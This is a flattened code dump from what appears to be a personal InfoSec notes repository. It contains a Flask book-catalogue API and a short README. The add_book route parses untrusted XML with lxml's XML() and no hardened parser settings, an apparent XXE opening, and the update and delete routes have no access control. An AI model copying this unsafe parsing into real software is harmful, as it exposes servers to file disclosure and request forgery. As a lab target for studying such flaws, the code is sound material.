Flask, request, jsonify, Response 4 | from flask_sqlalchemy import SQLAlchemy 5 | from lxml.etree import XML 6 | 7 | # Initial Setup 8 | 9 | app = Flask(__name__) 10 | 11 | app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///database.db' 12 | app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False 13 | 14 | db = SQLAlchemy(app) 15 | 16 | # Book Model 17 | 18 | class Book(db.Model): 19 | __tablename__ = 'books' 20 | id = db.Column(db.Integer, primary_key=True) 21 | title = db.Column(db.String(40), nullable=False) 22 | author = db.Column(db.String(40), nullable=False) 23 | desc = db.Column(db.String(1000), nullable=False) 24 | 25 | def json(self): 26 | return { 27 | 'id': self.id, 28 | 'title': self.title, 29 | 'author': self.author, 30 | 'desc': self.desc 31 | } 32 | 33 | def add_book(_title, _author, _desc): 34 | new_book = Book(title=_title, author=_author, desc=_desc) 35 | db.session.add(new_book) 36 | db.session.commit() 37 | 38 | def get_all_books(): 39 | return [Book.json(book) for book in Book.query.all()] 40 | 41 | def get_book(_id): 42 | return [Book.json(Book.query.filter_by(id=_id).first())] 43 | 44 | def update_book(_id, _title, _author, _desc): 45 | book_to_update = Book.query.filter_by(id=_id).first() 46 | book_to_update.title = _title 47 | book_to_update.author = _author 48 | book_to_update.desc = _desc 49 | db.session.commit() 50 | 51 | def delete_book(_id): 52 | Book.query.filter_by(id=_id).delete() 53 | db.session.commit() 54 | 55 | db.create_all() 56 | 57 | # API Routes 58 | 59 | @app.route('/api/books//', methods=['GET', 'PUT', 'DELETE']) 60 | def books_api(id): 61 | if request.method == 'GET': 62 | return_value = Book.get_book(id) 63 | return jsonify(return_value) 64 | 65 | elif request.method == 'PUT': 66 | request_data = request.get_json() 67 | Book.update_book( 68 | id, 69 | request_data['title'], 70 | request_data['author'], 71 | request_data['desc'] 72 | ) 73 | 74 | response = Response('Book Updated', status=200, mimetype='application/json') 75 | return response 76 | 77 | elif request.method == 'DELETE': 78 | Book.delete_book(id) 79 | response = Response('Book Deleted', status=200, mimetype='application/json') 80 | return response 81 | 82 | @app.route('/api/add_book/', methods=['POST']) 83 | def add_book(): 84 | if (request.content_type.startswith('application/json')): 85 | request_data = request.get_json() 86 | 87 | Book.add_book( 88 | request_data['title'], 89 | request_data['author'], 90 | request_data['desc'] 91 | ) 92 | 93 | elif (request.content_type.startswith('application/xml')): 94 | request_data = request.get_data() 95 | content_xml = XML(request_data) 96 | 97 | Book.add_book( 98 | content_xml.find('title').text.strip(), 99 | content_xml.find('author').text.strip(), 100 | content_xml.find('desc').text.strip() 101 | ) 102 | 103 | response = Response('Book Added', 201, mimetype='application/json') 104 | return response 105 | 106 | @app.route('/api/books/', methods=['GET']) 107 | def get_books(): 108 | return jsonify({'Books': Book.get_all_books()}) 109 | 110 | if __name__ == '__main__': 111 | app.run('0.0.0.0') 112 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## InfoSec Notes & Writeups 2 | 3 | Repos like these are doomed to be depreceated. This repo is a place for the *actual* notes I take, for *when* I need to take them, So I can reference them easily. Maybe you'll find somthing Helpful in it, idk. 4 | 5 | If your looking for a repo with thorough reference notes on general InfoSec things, [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/) and [Cheatsheet-God](https://github.com/OlivierLaflamme/Cheatsheet-God) are really good. 6 | --------------------------------------------------------------------------------